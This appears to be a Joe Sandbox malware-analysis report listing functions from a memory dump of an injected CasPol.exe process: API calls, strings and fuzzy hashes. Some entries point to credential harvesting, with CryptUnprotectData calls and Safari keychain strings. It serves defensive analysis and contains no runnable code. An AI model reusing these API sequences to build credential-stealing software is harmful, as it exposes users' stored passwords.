• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
• Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
• Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
• Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
• Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
• Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
• Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
APIs
• memset.MSVCRT ref: 004095FC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
• String ID:
• API String ID: 3655998216-0
• Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
• Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
• Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
• Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
APIs
• memset.MSVCRT ref: 00445426
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
• String ID:
• API String ID: 1828521557-0
• Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
• Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
• Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
• Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
APIs
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
• memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: ??2@FilePointermemcpy
• String ID:
• API String ID: 609303285-0
• Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
• Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
• Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
• Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
APIs
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: _wcsicmp
• String ID:
• API String ID: 2081463915-0
• Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
• Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
• Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
• Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
APIs
  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
• GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastRead
• String ID:
• API String ID: 2136311172-0
• Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
• Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
• Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
• Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
APIs
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
• ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: ??2@??3@
• String ID:
• API String ID: 1936579350-0
• Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
• Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
• Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
• Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
APIs
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3604893535-0
                                                                                                                                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4218492932-0
                                                                                                                                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1213725291-0
                                                                                                                                                                                    • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                    • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                    • free.MSVCRT ref: 00418370
                                                                                                                                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                                                                                                    • API String ID: 2360000266-2664311388
                                                                                                                                                                                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                    • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                                                                                                                                                      • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                      • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                      • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                      • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                      • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                      • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                      • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                      • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                      • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2633007058-0
                                                                                                                                                                                    • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                    • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                    • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                                    • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Version
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                                                    • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                    • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                                                    • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                    • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NtdllProc_Window
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4255912815-0
                                                                                                                                                                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                    • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                    • API String ID: 2929817778-1134094380
                                                                                                                                                                                    • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                    • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
